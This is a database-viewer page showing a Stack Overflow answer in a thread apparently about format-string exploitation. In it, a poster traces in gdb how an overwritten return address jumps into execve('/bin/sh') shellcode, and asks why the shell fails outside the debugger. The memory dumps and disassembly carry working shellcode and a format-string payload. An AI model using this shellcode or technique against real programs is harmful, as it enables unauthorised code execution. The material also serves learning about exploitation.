StackOverflow2013

Note that there are some explanatory texts on larger screens.

plurals

PO
primarykey
Id
5069150
data
AcceptedAnswerId
0
AnswerCount
0
ClosedDate
CommentCount
3
CommunityOwnedDate
CreationDate
2011-02-21T17:26:42.130
FavoriteCount
0
LastActivityDate
2011-02-21T17:34:29.413
LastEditDate
2011-02-21T17:34:29.413
LastEditorUserId
196561
OwnerUserId
620429
ParentId
5052648
PostTypeId
2
Score
0
ViewCount
0
LastEditorDisplayName
text
Body
The addresses have changes a little bit, but I've done what you told me, I've used stepi and the results are: After the strcpy the memory looks like: <pre><code>(gdb) x/50x $esp 0xbffff024: 0xbffff240 0xbffff040 0xbffff448 0xbffff050 0xbffff034: 0xbf000001 0xbffff040 0x00000004 0xbffff030 0xbffff044: 0xbffff031 0xbffff032 0xbffff033 0x315e1aeb 0xbffff054: 0x074688c0 0x5e891e8d 0x0c468908 0xf3890bb0 0xbffff064: 0x8d084e8d 0x80cd0c56 0xffffe1e8 0x69622fff 0xbffff074: 0x68732f6e 0x41414141 0x41414141 0x41414141 0xbffff084: 0x41414141 0x41414141 0x41414141 0x6e243625 0xbffff094: 0x41414141 0x41414141 0x41414141 0x41414141 </code></pre> we can see that the address to jump to is now 0xbffff050, which is correct (there lies our shellcode). and then I execute stepi: <pre><code>(gdb) i reg $eip eip 0x804846c 0x804846c <foo+24> (gdb) stepi 0x0804846d in foo (tmp=0x1 <Address 0x1 out of bounds>, format=0xbffff4f4 "_\366\377\277") at main.c:13 13 } </code></pre> let's analyze a little bit: <pre><code>(gdb) i reg $eip eip 0x804846d 0x804846d <foo+25> (gdb) x/4i $eip => 0x804846d <foo+25>: ret 0x804846e <main>: push ebp 0x804846f <main+1>: mov ebp,esp 0x8048471 <main+3>: sub esp,0x414 </code></pre> ok if I do one more stepi, then the return should be executed and the execution jumped on the address: 0xbffff050. and stepi again to execute return: <pre><code>(gdb) stepi 0xbffff050 in ?? () (gdb) x/4i $eip => 0xbffff050: jmp 0xbffff06c 0xbffff052: pop esi 0xbffff053: xor eax,eax 0xbffff055: mov BYTE PTR [esi+0x7],al 0xbffff058: lea ebx,[esi] 0xbffff05a: mov DWORD PTR [esi+0x8],ebx 0xbffff05d: mov DWORD PTR [esi+0xc],eax 0xbffff060: mov al,0xb (gdb) i reg $eip eip 0xbffff050 0xbffff050 </code></pre> ok it tried to jump on the 0xbffff050, but didn't succeed or what? The EIP is still at 0xbffff050. The memory looks like: <pre><code>(gdb) x/50x 0xbffff024 0xbffff024: 0xbffff240 0xbffff040 0xbffff448 0xbffff050 0xbffff034: 0xbf000001 0xbffff040 0x00000004 0xbffff030 0xbffff044: 0xbffff031 0xbffff032 0xbffff033 0x315e1aeb 0xbffff054: 0x074688c0 0x5e891e8d 0x0c468908 0xf3890bb0 0xbffff064: 0x8d084e8d 0x80cd0c56 0xffffe1e8 0x69622fff 0xbffff074: 0x68732f6e 0x41414141 0x41414141 0x41414141 0xbffff084: 0x41414141 0x41414141 0x41414141 0x6e243625 0xbffff094: 0x41414141 0x41414141 0x41414141 0x41414141 </code></pre> I didn't use the $esp to display memory, because it has changed from 0xbffff024 to 0xbffff034. Ok, let's jump to 0xbffff06c (this is beginning of the shellcode): <pre><code>(gdb) stepi 0xbffff06c in ?? () (gdb) x/4i $eip => 0xbffff06c: call 0xbffff052 </code></pre> Ok, let's call the 0xbffff052: <pre><code>(gdb) stepi 0xbffff052 in ?? () (gdb) x/4i $eip => 0xbffff052: pop esi 0xbffff053: xor eax,eax 0xbffff055: mov BYTE PTR [esi+0x7],al 0xbffff058: lea ebx,[esi] </code></pre> Let's store ESI register with the return address from the previous call: <pre><code>(gdb) stepi 0xbffff053 in ?? () (gdb) x/4i $eip => 0xbffff053: xor eax,eax 0xbffff055: mov BYTE PTR [esi+0x7],al 0xbffff058: lea ebx,[esi] 0xbffff05a: mov DWORD PTR [esi+0x8],ebx (gdb) i reg $esi esi 0xbffff071 -1073745807 </code></pre> Let's set EAX to 0: <pre><code>(gdb) stepi 0xbffff055 in ?? () (gdb) i reg $eax eax 0x0 0 </code></pre> Let's write the null in the location in memory: <pre><code>(gdb) x/4i $eip => 0xbffff055: mov BYTE PTR [esi+0x7],al 0xbffff058: lea ebx,[esi] 0xbffff05a: mov DWORD PTR [esi+0x8],ebx 0xbffff05d: mov DWORD PTR [esi+0xc],eax (gdb) x/20x $esp before: 0xbffff064: 0x8d084e8d 0x80cd0c56 0xffffe1e8 0x69622fff 0xbffff074: 0x68732f6e 0x41414141 0x41414141 0x41414141 after: 0xbffff064: 0x8d084e8d 0x80cd0c56 0xffffe1e8 0x69622fff 0xbffff074: 0x68732f6e 0x41414100 0x41414141 0x4141414 </code></pre> Execute the LEA instruction: <pre><code>(gdb) x/4i $eip => 0xbffff058: lea ebx,[esi] 0xbffff05a: mov DWORD PTR [esi+0x8],ebx 0xbffff05d: mov DWORD PTR [esi+0xc],eax 0xbffff060: mov al,0xb (gdb) x/x $esi 0xbffff071: 0x6e69622f (gdb) x/x $ebx 0x29aff4: 0x00158d7c (gdb) stepi 0xbffff05a in ?? () (gdb) x/x $ebx 0xbffff071: 0x6e69622f </code></pre> Another memory change: <pre><code>(gdb) x/4i $eip => 0xbffff05a: mov DWORD PTR [esi+0x8],ebx 0xbffff05d: mov DWORD PTR [esi+0xc],eax 0xbffff060: mov al,0xb 0xbffff062: mov ebx,esi (gdb) stepi 0xbffff05d in ?? () (gdb) stepi 0xbffff060 in ?? () (gdb) x/40x $esp 0xbffff064: 0x8d084e8d 0x80cd0c56 0xffffe1e8 0x69622fff 0xbffff074: 0x68732f6e 0xfff07100 0x000000bf 0x41414100 </code></pre> Fill EAX with system call: <pre><code>(gdb) x/4i $eip => 0xbffff060: mov al,0xb 0xbffff062: mov ebx,esi 0xbffff064: lea ecx,[esi+0x8] 0xbffff067: lea edx,[esi+0xc] (gdb) i reg $eax eax 0x0 0 (gdb) stepi 0xbffff062 in ?? () (gdb) i reg $eax eax 0xb 11 </code></pre> Fill ebx, ecx, edx: <pre><code>(gdb) x/4i $eip => 0xbffff062: mov ebx,esi 0xbffff064: lea ecx,[esi+0x8] 0xbffff067: lea edx,[esi+0xc] 0xbffff06a: int 0x80 (gdb) stepi 0xbffff064 in ?? () (gdb) stepi 0xbffff067 in ?? () (gdb) stepi 0xbffff06a in ?? () (gdb) i reg $eax $ebx $ecx $edx eax 0xb 11 ebx 0xbffff071 -1073745807 ecx 0xbffff079 -1073745799 edx 0xbffff07d -1073745795 </code></pre> Execute the int instruction: <pre><code>(gdb) x/4i $eip => 0xbffff06a: int 0x80 0xbffff06c: call 0xbffff052 0xbffff071: das 0xbffff072: bound ebp,QWORD PTR [ecx+0x6e] (gdb) stepi process 2863 is executing new program: /bin/dash Program exited normally. </code></pre> And another stepi: <pre><code>(gdb) stepi The program is not being run. </code></pre> So I guess there's no error, it works. But the problem remains that when I start the program normally, I just don't get the /bin/dash console. The curios thing is that the process 2863 just exits immediately...without prompting for a shell in the gdb? Any ideas?
Tags
Title
singulars
PostAcceptedAnswerId
1. This table or related slice is empty.
PostParentId
1. POFormat string bugs - exploitation
 singulars
 PostTypePostTypeId
 PTQuestion
PostTypePostTypeId
1. PTAnswer
UserLastEditorUserId
1. USosgx
UserOwnerUserId
1. USeleanor
plurals
PostLinksPostIdRelatedPostId
1. This table or related slice is empty.
PostLinksRelatedPostIdPostId
1. This table or related slice is empty.
PostsAcceptedAnswerId
1. This table or related slice is empty.
PostsParentIdCreationDate
1. This table or related slice is empty.
VotesPostIdCreationDate
1. This table or related slice is empty.
CommentsPostId

Querying!

Guidance

A row detail

Detail views are divided into sections. All the information in the data section comes from columns in the selected row. The other sections display data from other, related rows.

Related data can be related in a to-one or a to-many fashion. Captions of data related in a to-many fashion link to a list view showing a filtered view of the table.

Try moving around until you find a non-empty to-many entry and click on the label to get to one. You can move back to the root by clicking on the database name in the header.